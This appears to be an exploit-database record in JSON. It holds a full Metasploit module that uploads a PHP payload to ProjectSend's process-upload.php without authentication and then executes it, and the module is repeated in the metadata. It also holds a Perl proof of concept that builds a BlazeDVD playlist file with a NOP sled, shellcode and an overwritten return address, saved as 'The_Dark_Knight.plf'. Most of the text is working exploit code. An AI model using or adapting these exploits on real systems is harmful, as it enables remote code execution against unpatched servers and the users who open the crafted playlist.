ID 1337DAY-ID-23041 Type zdt Reporter metasploit Modified 2014-12-30T00:00:00
Description
This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ProjectSend Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ProjectSend
revisions 100 to 561. The 'process-upload.php' file allows
unauthenticated users to upload PHP files resulting in remote
code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Fady Mohammed Osman', # Discovery and Exploit
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '35424']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
['ProjectSend (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 02 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
], self.class)
end
#
# Checks if target upload functionality is working
#
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'process-upload.php')
)
if !res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
elsif res.code.to_i == 404
vprint_error("#{peer} - No process-upload.php found")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 500
vprint_error("#{peer} - Unable to write file")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
vprint_error("#{peer} - Software is misconfigured")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
# response on revision 118 onwards includes the file name
if res.body && res.body =~ /NewFileName/
return Exploit::CheckCode::Vulnerable
# response on revisions 100 to 117 does not include the file name
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
return Exploit::CheckCode::Appears
elsif res.body && res.body =~ /Failed to open output stream/
vprint_error("#{peer} - Upload folder is not writable")
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
#
# Upload PHP payload
#
def upload
fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
post_data = data.to_s
print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
if !res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
# response on revision 118 onwards includes the file name
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
print_good("#{peer} - Payload uploaded successfully (#{fname})")
return fname
# response on revisions 100 to 117 does not include the file name
elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
print_warning("#{peer} - File upload may have failed")
return fname
else
vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}")
fail_with(Failure::Unknown, "#{peer} - Something went wrong")
end
end
#
# Execute uploaded file
#
def exec(upload_path)
print_status("#{peer} - Executing #{upload_path}...")
res = send_request_raw(
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
)
if !res
print_status("#{peer} - Request timed out while executing")
elsif res.code.to_i == 404
vprint_error("#{peer} - Not found: #{upload_path}")
elsif res.code.to_i == 200
vprint_good("#{peer} - Executed #{upload_path}")
else
print_error("#{peer} - Unexpected reply")
end
end
#
# upload && execute
#
def exploit
fname = upload
register_files_for_cleanup(fname)
exec("upload/files/#{fname}") # default for r-221 onwards
unless session_created?
exec("upload/temp/#{fname}") # default for r-100 to r-219
end
end
end
# 0day.today [2018-01-06] #
{"hash": "b45fbd00bc811684a8ceee99c726a0c35d9504338363c56b8b774404d66e097a", "id": "1337DAY-ID-23041", "lastseen": "2018-01-06T07:00:21", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "1be4985a17c84e1f1e6be789bfeeb96f", "key": "href"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "9399f4c8f752b2882d1fc7d453c04008", "key": "sourceData"}, {"hash": "6e882c46fd45e6e50e548c3217287077", "key": "sourceHref"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "title": "ProjectSend Arbitrary File Upload Exploit", "history": [{"bulletin": {"hash": "461131f39537a6010b5e10d2edc8c2c40867e3a6dd6915e97f933b7b079c5757", "id": "1337DAY-ID-23041", "lastseen": "2016-04-20T02:13:19", "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T02:13:19"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b889bd0cfbd114f81bae34f1b4b53b0d", "key": "sourceData"}, {"hash": "c318f49173c357c51baf9365199ac4b1", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d49ed7013c17e5e554f40e5a7735c0a3", "key": "href"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "viewCount": 3, "title": "ProjectSend Arbitrary File Upload Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "http://0day.today/exploit/description/23041"}, "lastseen": "2016-04-20T02:13:19", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "https://0day.today/exploit/description/23041"}
{"zdt": [{"lastseen": "2018-01-05T05:05:26", "references": [], "description": "Exploit for unknown platform in category remote exploits", "edition": 2, "reporter": "LiquidWorm", "published": "2008-08-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "zdt", "title": "BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": [], "modified": "2008-08-10T00:00:00", "id": "1337DAY-ID-9236", "href": "https://0day.today/exploit/description/9236", "sourceData": "=============================================================\r\nBlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit\r\n=============================================================\r\n\r\n#!/usr/bin/perl\r\n#\r\n# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)\r\n#\r\n# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.\r\n# It can provide superior video and audio(Dolby) quality, together with other\r\n# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image\r\n# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,\r\n# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file\r\n# you have the codec installed for.The DVD player software can be extensive\r\n# compatible with hardware,which is operated stable,smoothly under Windows98,\r\n# 98SE, Me, 2000, XP, VISTA.\r\n#\r\n# Product web Page: http://www.blazevideo.com/dvd-player/index.htm\r\n#\r\n# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be\r\n# exploited via crafted PLF playlist file localy and remotely. It fails to\r\n# perform boundry checking of the user input file, allowing the EIP to be\r\n# overwritten, thus, controling the next insctruction of the software. After\r\n# succesfull exploitation, calc.exe will be executed. Failed attempts will\r\n# result in Denial Of Service (DoS).\r\n#\r\n# WinDgb(output):\r\n#\r\n# - (4d8.f80): Access violation - code c0000005 (first chance)\r\n# - First chance exceptions are reported before any exception handling.\r\n# - This exception may be expected and handled.\r\n# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c\r\n# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc\r\n# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216\r\n# - 41414141 ?? ???\r\n#\r\n#\r\n# Tested on Microsoft Windows XP SP2 (English)\r\n#\r\n# Vulnerability discovered by: Parvez Anwar and Greg Linares\r\n#\r\n# Refs:\r\n#\r\n# - http://secunia.com/advisories/23041/\r\n# - http://www.frsirt.com/english/advisories/2006/4764\r\n# - http://xforce.iss.net/xforce/xfdb/30567\r\n# - http://osvdb.org/30770\r\n# - http://www.securityfocus.com/bid/21337/\r\n# - http://www.milw0rm.com/exploits/2880\r\n#\r\n# Exploit coded by Gjoko 'LiquidWorm' Krstic\r\n#\r\n# [email\u00a0protected]\r\n#\r\n# http://www.zeroscience.org\r\n#\r\n# 08.08.2008\r\n#\r\n\r\nprint \"\\n|==================================================================|\\n\";\r\nprint \"| |\\n\";\r\nprint \"| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\\n\";\r\nprint \"| by LiquidWorm <liquidworm [at] gmail.com> |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|==================================================================|\\n\\n\";\r\n\r\n$nop = \"\\x90\" x 96;\r\n\r\n\r\n# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com\r\n\r\n$shellcode = \"\\x29\\xc9\\x83\\xe9\\xdd\\xd9\\xee\".\r\n\t \"\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\".\r\n\t \"\\x13\\x7d\\xe6\\xe7\\x4e\\x83\\xeb\".\r\n\t \"\\xfc\\xe2\\xf4\\x81\\x0e\\xa3\\x4e\".\r\n\t \"\\x7d\\xe6\\x6c\\x0b\\x41\\x6d\\x9b\".\r\n\t \"\\x4b\\x05\\xe7\\x08\\xc5\\x32\\xfe\".\r\n\t \"\\x6c\\x11\\x5d\\xe7\\x0c\\x07\\xf6\".\r\n\t \"\\xd2\\x6c\\x4f\\x93\\xd7\\x27\\xd7\".\r\n\t \"\\xd1\\x62\\x27\\x3a\\x7a\\x27\\x2d\".\r\n\t \"\\x43\\x7c\\x24\\x0c\\xba\\x46\\xb2\".\r\n\t \"\\xc3\\x4a\\x08\\x03\\x6c\\x11\\x59\".\r\n\t \"\\xe7\\x0c\\x28\\xf6\\xea\\xac\\xc5\".\r\n\t \"\\x22\\xfa\\xe6\\xa5\\xf6\\xfa\\x6c\".\r\n\t \"\\x4f\\x96\\x6f\\xbb\\x6a\\x79\\x25\".\r\n\t \"\\xd6\\x8e\\x19\\x6d\\xa7\\x7e\\xf8\".\r\n\t \"\\x26\\x9f\\x42\\xf6\\xa6\\xeb\\xc5\".\r\n\t \"\\x0d\\xfa\\x4a\\xc5\\x15\\xee\\x0c\".\r\n\t \"\\x47\\xf6\\x66\\x57\\x4e\\x7d\\xe6\".\r\n\t \"\\x6c\\x26\\x41\\xb9\\xd6\\xb8\\x1d\".\r\n\t \"\\xb0\\x6e\\xb6\\xfe\\x26\\x9c\\x1e\".\r\n\t \"\\x15\\x16\\x6d\\x4a\\x22\\x8e\\x7f\".\r\n\t \"\\xb0\\xf7\\xe8\\xb0\\xb1\\x9a\\x85\".\r\n\t \"\\x86\\x22\\x1e\\xc8\\x82\\x36\\x18\".\r\n\t \"\\xe6\\xe7\\x4e\";\r\n\r\n\r\n$ret = \"\\x78\\x53\\xbe\\x01\";\r\n\r\n$payload = $nop.$shellcode.$ret;\r\n\r\nopen(plf, \">./The_Dark_Knight.plf\");\r\n\r\nprint plf \"$payload\";\r\n\r\nprint \"\\n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!\\n\\n\";\r\n\r\nprint \"\\n...t00t w00t!\\n\\a\\n\";\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9236"}]}
